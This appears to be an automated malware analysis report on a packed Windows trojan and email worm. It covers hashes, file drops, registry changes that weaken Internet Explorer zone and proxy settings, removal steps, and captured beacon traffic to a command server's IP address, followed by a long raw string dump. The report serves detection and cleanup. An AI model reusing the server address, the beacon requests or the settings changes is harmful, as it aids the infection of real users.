HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
%original file name%.exe:208
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_RasPbFileShimCacheMutex
File activity
The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)
Registry activity
The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
147127382e001f495d1842ee7a9e7912 | c:\WINDOWS\system32\SkinH_EL.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1076750 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1081344 | 603664 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 1687552 | 401322 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2088960 | 383528 | 368640 | 1.56795 | 352a9695457ee0ad5ff21f6565a784ad |
.vmp0 | 2473984 | 2517355 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp0 | 4993024 | 49204 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5046272 | 3488220 | 3489792 | 5.49416 | bd74e24f97f5e8629357ae467e146b06 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326 | |
hxxp://221.123.147.73/piaoyh.aspx | |
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 221.123.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/
Cache-control: private
2....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 12
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=97E121E98E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 32
00280096003A009600E1002800EE003A....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 339
54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E124E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E....
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_208:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.vmp0
@.vmp0
`.vmp0
`.vmp0
`.vmp1
`.vmp1
g.EM^V7Z
g.EM^V7Z
EweB
EweB
e%f'G
e%f'G
.OO??b
.OO??b
cS.NO
cS.NO
.fF~p
.fF~p
EV.OrE
EV.OrE
X%fqwE
X%fqwE
$ÿ'
$ÿ'
òDC
òDC
.nO? 4
.nO? 4
M.Osc
M.Osc
}m.Bb~??
}m.Bb~??
.GFfz
.GFfz
k.bsSw
k.bsSw
Wn.QRA
Wn.QRA
.EEh(
.EEh(
b:\yL
b:\yL
\m.RB
\m.RB
]DU.Nmn
]DU.Nmn
<M><pre>Vm.BCP</pre><pre>3t5%f</pre><pre>.RQQA</pre><pre>e%F'G</pre><pre>>.NbC_</pre><pre>d%f'Kk</pre><pre>>..QQm</pre><pre>T.pO`x</pre><pre>MM.oO</pre><pre>t$(SSh</pre><pre>~%UVW</pre><pre>u$SShe</pre><pre>kernel32.dll</pre><pre>shlwapi.dll</pre><pre>user32.dll</pre><pre>ntdll.dll</pre><pre>ole32.dll</pre><pre>WinINet.dll</pre><pre>Wininet.dll</pre><pre>CreateWindowStationA</pre><pre>CloseWindowStation</pre><pre>ExitWindowsEx</pre><pre>HttpOpenRequestA</pre><pre>HttpSendRequestA</pre><pre>HttpQueryInfoA</pre><pre>GetAsyncKeyState</pre><pre>GetTcpTable</pre><pre>CreatePipe</pre><pre>MSXML2.XMLHTTP</pre><pre>Microsoft.XMLHTTP</pre><pre>MSXML2.ServerXMLHTTP</pre><pre>MSXML2.ServerXMLHTTP.6.0</pre><pre>WinHttp.WinHttpRequest.5.1</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)</pre><pre>application/x-www-form-urlencoded</pre><pre>Freestyle.exe</pre><pre>config.ini</pre><pre>1000000001</pre><pre>http://221.123.147.73/zhuzhou.txt</pre><pre>drivers\etc\hosts.asp</pre><pre>&SQL=</pre><pre>HTTP/1.1</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>http://</pre><pre>1.ini</pre><pre>2.ini</pre><pre>3.ini</pre><pre>4.ini</pre><pre>.Aqwertyuiopasdfghjklzxcvbnm</pre><pre>c:\11.bmp</pre><pre>C$%cmb</pre><pre>.ppM|</pre><pre> aZ.mO</pre><pre>%-^</pre><pre>.hk;~</pre><pre>KERNEL32.DLL</pre><pre>COMCTL32.dll</pre><pre>GDI32.dll</pre><pre>MSIMG32.dll</pre><pre>MSVCRT.dll</pre><pre>MSVFW32.dll</pre><pre>USER32.dll</pre><pre>SkinH_EL.dll</pre><pre>%System%\SkinH_EL.dll</pre><pre>%u y2</pre><pre>0.du./</pre><pre>.K.cW</pre><pre>}.Dkn</pre><pre>OkC.xL</pre><pre>%System%\esdpf.she</pre><pre>1990317927</pre><pre>@kernel32.dll</pre><pre>90*('$$-</pre><pre>1-TOUCH PASS</pre><pre>F%*.*f</pre><pre>CNotSupportedException</pre><pre>commctrl_DragListMsg</pre><pre>Afx:%x:%x:%x:%x:%x</pre><pre>Afx:%x:%x</pre><pre>COMCTL32.DLL</pre><pre>CCmdTarget</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>SHLWAPI.dll</pre><pre>MPR.dll</pre><pre>VERSION.dll</pre><pre>WSOCK32.dll</pre><pre>.PAVCException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCFileException@@</pre><pre>(*.prn)|*.prn|</pre><pre>(*.*)|*.*||</pre><pre>Shell32.dll</pre><pre>Mpr.dll</pre><pre>Advapi32.dll</pre><pre>User32.dll</pre><pre>Gdi32.dll</pre><pre>Kernel32.dll</pre><pre>(&07-034/)7 '</pre><pre>?? / %d]</pre><pre>%d / %d]</pre><pre>: %d]</pre><pre>(*.WAV;*.MID)|*.WAV;*.MID|WAV</pre><pre>(*.WAV)|*.WAV|MIDI</pre><pre>(*.MID)|*.MID|</pre><pre>(*.txt)|*.txt|</pre><pre>(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG</pre><pre>(*.JPG)|*.JPG|BMP</pre><pre>(*.BMP)|*.BMP|GIF</pre><pre>(*.GIF)|*.GIF|</pre><pre>(*.ICO)|*.ICO|</pre><pre>(*.CUR)|*.CUR|</pre><pre>%s:%d</pre><pre>windows</pre><pre>out.prn</pre><pre>%d.%d</pre><pre>%d / %d</pre><pre>%d/%d</pre><pre>Bogus message code %d</pre><pre>(%d-%d):</pre><pre>%ld%c</pre><pre>http://dywt.com.cn</pre><pre>service@dywt.com.cn</pre><pre> 86(0411)88995834</pre><pre> 86(0411)88995831</pre><pre>Windows</pre><pre>(ESPINN.dll(NN</pre><pre>This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info</pre><pre>CallerInfoCopyCmd</pre><pre>SetIPPort</pre><pre>GetIPPort</pre><pre>"C:\Windows\System32\ESPI11.dll"</pre><pre>ProviderInstallCopyCmd</pre><pre>SockDataCopyCmd</pre><pre>SockAddrCopyCmd</pre><pre>enetintercept_fnSockAddrSetIPPort</pre><pre>enetintercept_fnSockAddrGetIPPort</pre><pre>enetintercept_fnInstallCopyCmd</pre><pre>enetintercept_fnSockDataCopyCmd</pre><pre>enetintercept_fnSockAddrCopyCmd</pre><pre>enetintercept_fnCallerInfoCopyCmd</pre><pre>%s\ESPI%d.dll</pre><pre>HTTP/1.0</pre><pre>%s <%s></pre><pre>Reply-To: %s</pre><pre>From: %s</pre><pre>To: %s</pre><pre>Subject: %s</pre><pre>Date: %s</pre><pre>Cc: %s</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>SMTP</pre><pre>www.dywt.com.cn</pre><pre>X-X-X-X-X-X</pre><pre><Msg%s>%ld</Msg%s></pre><pre>0000%d</pre><pre></pre><pre><Msg0000></Msg0000></pre><pre>EMSG</pre><pre>Recv Sub Packet(%s)..</pre><pre>Recv Packet (%s)...</pre><pre>1.1.3</pre><pre>;3 #>6.&</pre><pre>'2, / 0&7!4-)1#</pre><pre>%d%d%d</pre><pre>rundll32.exe shell32.dll,</pre><pre>.PAVCObject@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCMemoryException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCCmdTarget@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>c:\%original file name%.exe</pre><pre> (&''&(,</pre><pre>*%).--.)%$</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>>6n.Rr:,</pre><pre>WEBh</pre><pre>D$%%f&G</pre><pre>Vm.BB</pre><pre>|f.oz</pre><pre>n.nn/</pre><pre>5vBN.rR,</pre><pre>5%FWq</pre><pre>],.yx</pre><pre>.fJ&7</pre><pre>.GhX3</pre><pre>H,.sS</pre><pre>-DEYZ}</pre><pre>H<M><pre>>.Nb!V</pre><pre>;<M%f><pre>5-%%FjZ</pre><pre> l%fG</pre><pre>J.fWvVg</pre><pre>_, 792:"</pre><pre>$EE%f</pre><pre>:#Sz%u</pre><pre>n.Rr:$</pre><pre>l%uJ8</pre><pre>%fz[&</pre><pre>7Ww%f</pre><pre>%f:El3</pre><pre>.Rr: EP</pre><pre>.RB%eU</pre><pre>=-.Bb</pre><pre>.OscF6Vj^j</pre><pre>,LM.OP</pre><pre>J*.nB</pre><pre>.OscF&</pre><pre>.N.op</pre><pre>.RJK;</pre><pre>hI%ul</pre><pre>yf.oz</pre><pre>t!:%su</pre><pre>ÿ6w</pre><pre>Kn.BQ</pre><pre>6.Or:</pre><pre>-Aa}=</pre><pre>6.EEh</pre><pre>:$X-0}|</pre><pre>%0xpu</pre><pre>*b.ar3</pre><pre>CD%%F</pre><pre>)>.Oc</pre><pre> #-mx}</pre><pre>W:\Jn</pre><pre>.Nr:%</pre><pre>.oz(~</pre><pre>N:%xI</pre><pre>Q:%ss</pre><pre>|\:%u;</pre><pre>{m:%f</pre><pre>4X:%dW</pre><pre>%Xym:%X </pre><pre>v!:%S</pre><pre>:%CX7</pre><pre>.RJBCC$e</pre><pre>cS.gH</pre><pre>%FjZ54</pre><pre>z%f::5\</pre><pre>-.RQP</pre><pre>w%Fj::</pre><pre>6:|s.vr</pre><pre>t5%fz</pre><pre>DU.nE</pre><pre>n.RQQA</pre><pre>.PXjk-z[</pre><pre>SQL F</pre><pre>%fwe%</pre><pre>.FfVw5</pre><pre>M.RB%></pre><pre>eE%f'</pre><pre>~V.Nrb</pre><pre>.RR:8|p</pre><pre>.FFZE</pre><pre>.Os4:&</pre><pre>D$ B!.Wh</pre><pre>,=>("{[-></pre><pre>~|/f.yx~;</pre><pre>.Rr:></pre><pre>-.RSw</pre><pre>ôt:></pre><pre>ymEÿ</pre><pre>N.Rs:></pre><pre>.pweo</pre><pre>.ol0c</pre><pre>ev.NLL</pre><pre>l-M.Nr3:?z</pre><pre>:?e%fw</pre><pre>..op0</pre><pre>.Osc>V</pre><pre>6.NqE</pre><pre>N%fwE</pre><pre>D$$%u</pre><pre>bX*%u</pre><pre>m.NOs</pre><pre>%.RcDh</pre><pre> e.fF</pre><pre>!n.RB</pre><pre>%~<M><pre>.WE}]-G</pre><pre>D<45ò</pre><pre>-i1l}</pre><pre>llzCJ%U</pre><pre>-=N.RB</pre><pre>.fGk O:2</pre><pre>*N.RB</pre><pre>v.OEO<</pre><pre>3.um.</pre><pre>^,0<83:2</pre><pre>[]M.By^</pre><pre>?:3E.WhH</pre><pre>.LCT-</pre><pre>%Fj:3(</pre><pre>m.nNn</pre><pre>.Rr:0</pre><pre>mK.CQe</pre><pre>D$$1%x4</pre><pre>%Fj :0R</pre><pre>.inzE</pre><pre>5%fz;W8</pre><pre>b"Cc$%f&</pre><pre> n)|.CU</pre><pre>e\.YvRc</pre><pre>#D%%F</pre><pre>.N.nO</pre><pre>rM.nn</pre><pre>w%F:6.</pre><pre>.Pa!EDD4</pre><pre>KV.Xi</pre><pre>m..nOp</pre><pre>~n*%uNg</pre><pre>.EEYYm</pre><pre>.RB%></pre><pre> :.Ne</pre><pre>%Fj:6</pre><pre>.FfV12</pre><pre>m.Nrb</pre><pre>}m.Bv</pre><pre>_,6<92:4</pre><pre>$.Oc9</pre><pre>#c$%F</pre><pre>Zn.BQ</pre><pre>n.RS:2</pre><pre>ÿ##G7</pre><pre>E5.ws</pre><pre>&J:.ff~</pre><pre>.NbBV</pre><pre>=N.Rk</pre><pre>?cS6.nOsc</pre><pre>D$ (%9U</pre><pre>cDd%f</pre><pre>.OP0T</pre><pre>D$<7%s4</pre><pre>x%fYj</pre><pre>.Nq2FM</pre><pre>mn.vaV</pre><pre>7.gVg:</pre><pre>d%FG'</pre><pre>.QRvf</pre><pre>.KPay</pre><pre>*%u-,D</pre><pre>.Egio</pre><pre>uU.fe</pre><pre>N.RB6n.</pre><pre>} m.Os</pre><pre>n.yasw/@</pre><pre>-.Rr:</pre><pre>"cd%F&</pre><pre>.Nrjk[</pre><pre>K$..BV</pre><pre>.Ok &</pre><pre>Jn.RB</pre><pre>.Nj*N\</pre><pre>^*.af</pre><pre>H E%8x@i</pre><pre>,\m.RB</pre><pre>*=$H</pre><pre>%FjZ5</pre><pre>D$,%c;2</pre><pre>.Vgff</pre><pre>D$<1%x4</pre><pre>V.-e}5</pre><pre>L|.yh 1q</pre><pre>"3t|.yP</pre><pre>V.Vhm</pre><pre>l-.RB</pre><pre>.oOs4</pre><pre>.Jkiz</pre><pre>?.hizS</pre><pre>%F'gg</pre><pre>D$$%s</pre><pre>.nh7F</pre><pre>öWk</pre><pre>.Ey%FN</pre><pre>.LePa</pre><pre>.Nrb=VwO</pre><pre>)Jm.RB</pre><pre>.ajBS</pre><pre>%XltIl</pre><pre>.mAdx#</pre><pre>!,;2%Dkr</pre><pre>.AXO>]lyOd</pre><pre>%FH7f</pre><pre>2u!63%f</pre><pre>5J@Ü</pre><pre>#d.NHF</pre><pre>&.Vx}</pre><pre>jJ%8x</pre><pre>WINMM.dll</pre><pre>WS2_32.dll</pre><pre>GetWindowsDirectoryA</pre><pre>WINSPOOL.DRV</pre><pre>UnregisterHotKey</pre><pre>RegEnumKeyA</pre><pre>ShellExecuteA</pre><pre>)~.cQ</pre><pre>d3%6x</pre><pre>]Qo@%x</pre><pre>È~qJ</pre><pre>.Rv}#</pre><pre>&/%x0p</pre><pre>J.rhd</pre><pre>*.VP=</pre><pre>LF.LF</pre><pre>CreateDialogIndirectParamA</pre><pre>SetViewportOrgEx</pre><pre>@.vl]</pre><pre>^6a.yUZ</pre><pre>?X.bry</pre><pre>.qL@.^H</pre><pre>.ntPrN</pre><pre>`-21$%DH</pre><pre> .GK`,/</pre><pre>' .,5?9@'</pre><pre>wgio.kj</pre><pre>(.KI*\</pre><pre>'.nU'6</pre><pre>$^0(4635</pre><pre>-in}I</pre><pre>_^.go</pre><pre>KRQU.Xb</pre><pre>.-(263?@</pre><pre>% -46?>@</pre><pre>7bn.pu</pre><pre>\v\.ad</pre><pre>e !%F</pre><pre>%uLqs~X</pre><pre>%gm.ku</pre><pre>8L.Xh_e</pre><pre>?=E.OV</pre><pre>[%c{H</pre><pre>FJOQ.UV</pre><pre>WeBn</pre><pre>fk-hmpx}</pre><pre>hudp</pre><pre>~"$!-(1<</pre><pre>$p.to</pre><pre>HO.NR</pre><pre>jh.ry</pre><pre>.KYHq</pre><pre>WAw]%XX] </pre><pre>'"/8-.*, </pre><pre>?WZ.Xa</pre><pre>%X$)13</pre><pre>%F"@:</pre><pre>$-164138</pre><pre>Y].cf</pre><pre>`l.mw</pre><pre>]`eik.om</pre><pre>e(#&.OJ</pre><pre>#(0352>:</pre><pre>MKS.VQ</pre><pre>".ODA</pre><pre>DKR[f.no</pre><pre>GAC.IM</pre><pre>1;GCE.NIhHK</pre><pre>OEXe</pre><pre>~72K.dH@</pre><pre>68=;V<.GK(NV]^Z</pre><pre>zY.hL</pre><pre>.AqVm</pre><pre>POo>.hJ</pre><pre>.pl/)T</pre><pre>;D.jy!</pre><pre>oi4.YS</pre><pre>Wl.MYH</pre><pre>"=N.CHC</pre><pre>=T%Xz3</pre><pre>E.tO{I</pre><pre>PZfoO.aN</pre><pre>.jueI</pre><pre>O0.Ya</pre><pre>.Nk/}</pre><pre>2.NrO</pre><pre>1.ZT[</pre><pre>QA.tB</pre><pre>.my.(</pre><pre>J[.TO</pre><pre>KR.kQ</pre><pre>.WWQeJ</pre><pre>.DHtS</pre><pre>%UGNV</pre><pre>/(X.bl</pre><pre>.XEU^</pre><pre>%x9}o</pre><pre>H%sia</pre><pre>.miQ,</pre><pre>%d`;L'iCN</pre><pre>q.xCg</pre><pre>B:\8o@</pre><pre>.gr=6Z</pre><pre>WININET.dll</pre><pre>RegDeleteKeyA</pre><pre>ADVAPI32.dll</pre><pre>InternetCrackUrlA</pre><pre>OLEAUT32.dll</pre><pre>SetWindowsHookExA</pre><pre>RegisterHotKey</pre><pre>GetViewportExtEx</pre><pre>RegOpenKeyA</pre><pre>6u!'$%f</pre><pre>RASAPI32.dll</pre><pre>.CxeYi</pre><pre>The procedure entry point %c could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>GetProcessHeap</pre><pre>InternetCanonicalizeUrlA</pre><pre>OffsetViewportOrgEx</pre><pre>WinExec</pre><pre>@0@@@8@ @</pre><pre>=.lh4.</pre><pre>S%XQ([H</pre><pre>DI.UQ</pre><pre># ,) 126</pre><pre>X".CO</pre><pre>xD.COX</pre><pre>W.hp@</pre><pre>^`.mk</pre><pre>9.AE`DHQW</pre><pre>WG.alq</pre><pre>/'%SzW</pre><pre>%&#/.(51</pre><pre>70>;:@/,</pre><pre>e.oh/u</pre><pre>/I.OO</pre><pre>%.ORs</pre><pre>.mdxp</pre><pre>Y%u(p</pre><pre>b615?GM.PY</pre><pre>Jp$.OLD</pre><pre>b%sMn</pre><pre>"!@'#,19</pre><pre>3S.OG</pre><pre>.KT`_fcd</pre><pre>:v=D.OJ</pre><pre>a.zx(</pre><pre>%Dx*R </pre><pre>\.xR@</pre><pre>.ns)zx</pre><pre>7ce.nw</pre><pre>0%FIPF</pre><pre>.;.ibi</pre><pre>.OzHo=1</pre><pre>n'.KR</pre><pre>%xRWU]</pre><pre>8?>7D.IW</pre><pre>v16.JX</pre><pre>HVZ.XY</pre><pre>*-0,(53?]</pre><pre>"*/4368.GJf</pre><pre>ib.mT</pre><pre>4M.YH</pre><pre>4Y`en.oi7</pre><pre>.!)`5<8:</pre><pre>.gl#(</pre><pre>bKeY</pre><pre> 01?F@I.OT</pre><pre>(.HSO</pre><pre>$&! 517</pre><pre>{@'(3251?&</pre><pre>Ê1(*</pre><pre>f.EK0</pre><pre>!,. 3(2;8'"</pre><pre>Î@I</pre><pre>ef.kn)q{5</pre><pre>t-.WD</pre><pre>.DC_)@q</pre><pre>$!-.43<)</pre><pre>.XHm_</pre><pre>u_bnw.rz</pre><pre>.)689?;></pre><pre>' .(6740</pre><pre>Bk.wv</pre><pre>.pyP}</pre><pre>9<D><pre>Y`.mt</pre><pre>[%/-08=?</pre><pre>!o.XJA|,</pre><pre>[y%.Pas</pre><pre>` ðA</pre><pre>%Fj>j</pre><pre>T^\_[X.dnF</pre><pre>3.ePf</pre><pre>$! '#,0:</pre><pre>!*/)6.5<</pre><pre>MU]fa.gl</pre><pre>ZY.KJ</pre><pre>XZ(.TL</pre><pre>H:.woz`</pre><pre>UWP]aio.np</pre><pre>V8.EC</pre><pre>& #(1159</pre><pre>.6?<.GI8KLJQR</pre><pre>#/0)4265</pre><pre>.GDe(d</pre><pre>~B.Fg</pre><pre>`.joxpsqr</pre><pre>Q.upeK</pre><pre>-Xd},</pre><pre>,4>8EAL.MV</pre><pre> .HqK</pre><pre>5'".ME</pre><pre>" !-)72?</pre><pre>.ovxnr~</pre><pre>gV`.jp</pre><pre>p5T24V=.DCJM</pre><pre>n/.ON</pre><pre>*.,/521=</pre><pre>j(/)0=.FD@HMITUq5</pre><pre>"j%FP</pre><pre>! -1427<</pre><pre>t%Do}4</pre><pre>;.EMV</pre><pre>.b.OU</pre><pre>BDL.VSIXc</pre><pre>| "/, 536=>:</pre><pre>$".745>6</pre><pre>?9CK.WZ</pre><pre>mlknj.vw</pre><pre>Ygb.nw</pre><pre>.jWZ4</pre><pre>%fjb1</pre><pre>.LS[Z 